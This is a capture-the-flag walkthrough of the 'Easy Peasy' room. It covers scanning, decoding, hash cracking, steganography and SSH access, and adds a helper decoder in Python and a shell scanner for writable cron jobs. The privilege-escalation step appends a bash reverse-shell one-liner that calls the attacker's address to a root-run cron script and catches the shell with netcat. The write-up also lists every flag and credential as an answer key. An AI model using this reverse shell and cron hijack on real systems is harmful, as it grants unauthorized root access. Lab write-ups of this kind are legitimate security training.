# Easy Peasy

#### rustscan

> open ports: 80, 6498, 65524

> NGINX is a high-performance open source web server that serves a site's static content quickly and is easy to configure. It offers load balancing, reverse proxy and streaming features, and handles thousands of simultaneous connections.

#### gobuster

```
gobuster dir --url http://10.10.60.150 -w /usr/share/wordlists/dirb/common.txt -t 30 -k -x py,html,txt
```

> found `/hidden`, and inside it `/hidden/whatever`, which holds the first flag

#### cyberchef

`ZmxhZ3tmMXJzN19mbDRnfQ==` *found in /hidden/whatever; the From Base64 recipe gives* `flag{f1rs7_fl4g}`

`a18672860d0510e5ab6699730763b250` *MD5 hash found in 10.10.60.150:65524/robots.txt; looked up on* [md5hashing](https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250)

*page source of 10.10.60.150:65524 contains* `flag{9fdafbd64c47471a8f54cd3fc64cd312}`

> the same source also carries a hint: `its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu`

*the From Base62 recipe gives the hidden directory* `/n0th1ng3ls3m4tt3r`

#### john

> hash found in the hidden directory (GOST, hence `--format=GOST` below): `940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81`

```
john --wordlist=/home/kali/Downloads/easypeasy/easypeasy.txt hash --format=GOST
```

*cracked password:* `mypasswordforthatjob`

#### steghide

> download the matrix image from the hidden directory and extract the embedded file with steghide, using the password cracked with john as the passphrase

```
steghide extract -sf binarycodepixabay.jpg
```

```
cat secrettext.txt
```

> username:boring password: 01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

*CyberChef From Binary gives* `boring:iconvertedmypasswordtobinary`

#### ssh

```
ssh boring@10.10.60.150 -p 6498
```

> user flag found as `synt{a0jvgf33zfa0ez4y}`; ROT13 gives `flag{n0wits33msn0rm4l}`
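Every CyberChef step in this writeup (From Base64, the MD5 lookup, From Base62, From Binary, ROT13) can be reproduced offline. The script below is an added example, not part of the original room or writeup; it uses the strings quoted on this page as sample input and implements the one non-trivial decoder, Base62, the way CyberChef does (whole string as one big-endian integer over the default `0-9A-Za-z` alphabet, an assumption about CyberChef's default that the decoded directory name confirms). The MD5 check re-hashes the md5hashing.net answer locally instead of trusting the site.

```python
"""Offline replacements for the CyberChef recipes used in this writeup (added example)."""
import base64
import codecs
import hashlib
import string

# Default alphabet of CyberChef's "From Base62" operation (assumption): 0-9, A-Z, a-z.
BASE62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase

# Artifacts quoted on this page.
FLAG1_B64 = "ZmxhZ3tmMXJzN19mbDRnfQ=="
FLAG2_MD5 = "a18672860d0510e5ab6699730763b250"
HIDDEN_DIR_B62 = "ObsJmP173N2X6dOrAgEAL0Vu"
BINARY_PASSWORD = (
    "01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 "
    "01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 "
    "01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 "
    "01101110 01100001 01110010 01111001"
)
USER_FLAG_ROT13 = "synt{a0jvgf33zfa0ez4y}"


def base62_decode(data: str, alphabet: str = BASE62_ALPHABET) -> bytes:
    """Decode Base62 as CyberChef does: the whole string is one big-endian
    integer in base 62 and the result is that integer's minimal byte string.
    Unlike Base64 there are no fixed-width groups, so the output length is
    dictated purely by the magnitude of the number."""
    value = 0
    for ch in data:
        value = value * 62 + alphabet.index(ch)  # ValueError on a foreign character
    if value == 0:
        return b""
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


def binary_to_text(bits: str) -> str:
    """Turn whitespace-separated 8-bit groups ('01101001 01100011 ...') into text."""
    return "".join(chr(int(group, 2)) for group in bits.split())


def rot13(text: str) -> str:
    """ROT13 only rotates ASCII letters; braces, digits and underscores pass through."""
    return codecs.decode(text, "rot13")


def md5_matches(candidate: str, hexdigest: str) -> bool:
    """Re-hash a lookup-site result locally rather than trusting the site."""
    return hashlib.md5(candidate.encode()).hexdigest() == hexdigest.lower()


def decode_all() -> dict:
    """Run every decoding from the page and return the results keyed by step."""
    return {
        "flag1": base64.b64decode(FLAG1_B64).decode(),
        "hidden_dir": base62_decode(HIDDEN_DIR_B62).decode(),
        "ssh_password": binary_to_text(BINARY_PASSWORD),
        "user_flag": rot13(USER_FLAG_ROT13),
        # Plaintext as returned by the md5hashing.net lookup in the writeup;
        # the check confirms it really hashes to the value from robots.txt.
        "flag2_lookup_verified": md5_matches("flag{1m_s3c0nd_fl4g}", FLAG2_MD5),
    }


if __name__ == "__main__":
    for step, result in decode_all().items():
        print(f"{step:22} {result}")
```

`base62_decode` is the part worth keeping around: the Base62 strings seen in CTFs are almost always big-integer encodings, and a decoder written as fixed-width groups (the Base64 mental model) silently produces garbage for them.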

#### priv esc

```
cat /etc/crontab
```

> `/etc/crontab` shows an interesting job: `/var/www/.mysecretcronjob.sh` is run every minute, and it runs as root.

```
ls -la /var/www/.mysecretcronjob.sh
```

> `-rwxr-xr-x 1 boring boring 33 Jun 14 2020 /var/www/.mysecretcronjob.sh`: the script is owned and writable by `boring` but executed by root, so anything we append to it runs as root within a minute.
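The enumeration above is a pattern worth automating: read the system crontab, take each job's script path, and check whether the current user can write to it. The function below is an added example (not from the room or the writeup) that does exactly that for any file in system-crontab format (five time fields, user, command), including `@reboot`-style shorthand lines. Run it as the low-privileged user you are testing as; as root `-w` is true for every file and the output is meaningless.

```sh
#!/bin/sh
# Added example (not part of the original writeup): list cron jobs whose
# script file the current user can modify. Input is a system-crontab-format
# file (five time fields, user, command) such as /etc/crontab or /etc/cron.d/*.
# Output: one "<user> <script>" line per job whose first command word is an
# existing file we have write access to. A root job that runs a script writable
# by a low-privileged user is exactly the misconfiguration abused here.
find_writable_cron_targets() {
  crontab_file=$1
  set -f                                  # keep '*' time fields from globbing
  while IFS= read -r line || [ -n "$line" ]; do
    set -- $line                          # word-split the line into $1..$n
    [ $# -gt 0 ] || continue              # blank line
    case $1 in
      \#*|*=*) continue ;;                # comment, or SHELL=/PATH= assignment
    esac
    if [ "${1#@}" != "$1" ]; then         # @reboot/@hourly shorthand: one time field
      [ $# -ge 3 ] || continue
      user=$2; script=$3
    else                                  # standard form: five time fields
      [ $# -ge 7 ] || continue
      user=$6; script=$7
    fi
    if [ -f "$script" ] && [ -w "$script" ]; then
      printf '%s %s\n' "$user" "$script"
    fi
  done < "$crontab_file"
  set +f
}

# Usage on a live box: scan the system crontab and the drop-in directory.
for f in /etc/crontab /etc/cron.d/*; do
  if [ -r "$f" ]; then
    find_writable_cron_targets "$f"
  fi
done
```

Only the first word of the command is inspected, so a job written as `bash /var/www/script.sh` would be reported as `bash` rather than the script; extend the check to later words if the target box uses that style.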

[revshells](https://www.revshells.com/) supplies the one-liner; append it to the script (`10.18.1.00` is the attacker's VPN address in this writeup, substitute your own):

```
echo 'bash -i >& /dev/tcp/10.18.1.00/4444 0>&1' >> /var/www/.mysecretcronjob.sh
```

On the kali machine, start the listener; the root shell arrives the next time the cron job fires (within a minute):

```
rlwrap nc -nlvp 4444 
```

```
cd /root
```

```
ls -la
```

> `/root/.root.txt` contains `flag{63a9f0ea7bb98050796b649e85481845}`

* How many ports are open? *3*
* What is the version of nginx? *1.16.1*
* What is running on the highest port? *Apache*
* Using GoBuster, find flag 1. *flag{f1rs7\_fl4g}*
* Further enumerate the machine, what is flag 2? *flag{1m\_s3c0nd\_fl4g}*
* Crack the hash with easypeasy.txt, what is flag 3? *flag{9fdafbd64c47471a8f54cd3fc64cd312}*
* What is the hidden directory? */n0th1ng3ls3m4tt3r*
* Using the wordlist provided to you in this task, crack the hash. What is the password? *mypasswordforthatjob*
* What is the password to log in to the machine via SSH? *iconvertedmypasswordtobinary*
* What is the user flag? *flag{n0wits33msn0rm4l}*
* What is the root flag? *flag{63a9f0ea7bb98050796b649e85481845}*
